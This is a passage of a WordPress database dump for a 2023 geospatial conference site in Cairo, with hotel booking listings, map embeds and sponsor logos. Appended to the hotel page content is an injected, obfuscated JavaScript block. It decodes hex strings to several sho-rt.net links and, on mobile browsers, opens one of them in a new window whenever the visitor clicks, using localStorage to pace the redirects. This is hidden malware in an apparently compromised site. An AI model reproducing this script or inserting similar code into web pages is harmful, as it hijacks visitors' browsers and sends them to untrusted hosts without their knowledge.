href=\"https://gsw2023.com/index.php/flamenco-cairo-hotel/\"><span style=\"font-size: 18pt;\">BOOK NOW </span> </a></strong></span></h2>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2688\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Steigenberger Hotel El Tahrir</span></h2>\n<p><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo\" target=\"_blank\" rel=\"noopener\">https://www.steigenberger.com/en/hotels/all-hotels/egypt/cairo/steigenberger-el-tahrir-cairo</a></strong></span></p>\n<p style=\"text-align: left;\"><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.655731227902!2d31.233070315528174!3d30.046733125418612!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840c6e7b40217%3A0xa56e70b7cb4fa53d!2sSteigenberger%20Hotel%20El%20Tahrir%20Cairo!5e0!3m2!1sen!2seg!4v1663340357638!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<h2 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 14pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\"><span style=\"font-size: 24pt;\">BOOK NOW </span> </a></strong></span></h2>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 14pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/steigenberger-hotel-el-tahrir/\">Steigenberger Hotel El Tahrir – GSW2023</a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4788\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Grand Nile Tower Hotel</span></h2>\n<ul>\n<li><span style=\"color: #ffffff;\"><a style=\"color: #ffffff;\" href=\"https://www.grandniletower.com/\">https://www.grandniletower.com/</a></span></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3454.091887744032!2d31.22467591511475!3d30.03422158188607!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x14584090695d6421%3A0x201285387107863a!2sGrand%20Nile%20Tower!5e0!3m2!1sen!2ssa!4v1689721277379!5m2!1sen!2ssa\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\"></iframe></p>\n<h1 style=\"text-align: center;\"><span style=\"color: #3366ff; font-size: 24pt;\"><strong><a style=\"color: #3366ff;\" href=\"https://gsw2023.com/index.php/grand-nile-tower-hotel/\">BOOK NOW</a></strong></span></h1>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"4730\" bg_color=\"rgba(255,255,255,0.4)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 class=\"vc_custom_heading\" style=\"text-align: center;\"><span style=\"color: #ffffff;\">Novotel Cairo El Borg</span></h2>\n<ul>\n<li><span style=\"color: #ffffff; font-size: 12pt;\"><strong><a style=\"color: #ffffff;\" href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></strong></span></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<ul>\n<li>\n<h4><span style=\"color: #ffffff;\">Special Rate Booking is Opened Now</span></h4>\n<h5><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n</li>\n</ul>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://gsw2023.com/index.php/novotel-cairo-el-borg/\"><span style=\"color: #ffff00;\">BOOK NOW </span> </a></strong></span></h4>\n<p>[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][dt_banner image_id=\"2689\" bg_color=\"rgba(255,255,255,0.01)\" border_width=\"2\" outer_padding=\"5\" inner_padding=\"5\"]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Kempinski Nile Hotel Garden City Cairo</span></h2>\n<ul>\n<li><strong><span style=\"font-size: 12pt; color: #0000ff;\"><a style=\"color: #0000ff;\" href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></span></strong></li>\n</ul>\n<p><iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"200\" height=\"200\" allowfullscreen=\"allowfullscreen\" data-mce-fragment=\"1\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span></iframe></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/dt_banner][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-07-28 18:50:01','2023-07-28 18:50:01','',2685,'https://gsw2023.com/?p=5060',0,'revision','',0),
(5061,1,'2023-07-29 03:10:18','2023-07-29 03:10:18','','Logo Pure','','inherit','open','closed','','logo-pure','','','2023-07-29 03:10:18','2023-07-29 03:10:18','',3066,'https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2.jpg',0,'attachment','image/jpeg',0),
(5062,1,'2023-07-29 03:14:47','2023-07-29 03:14:47','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" 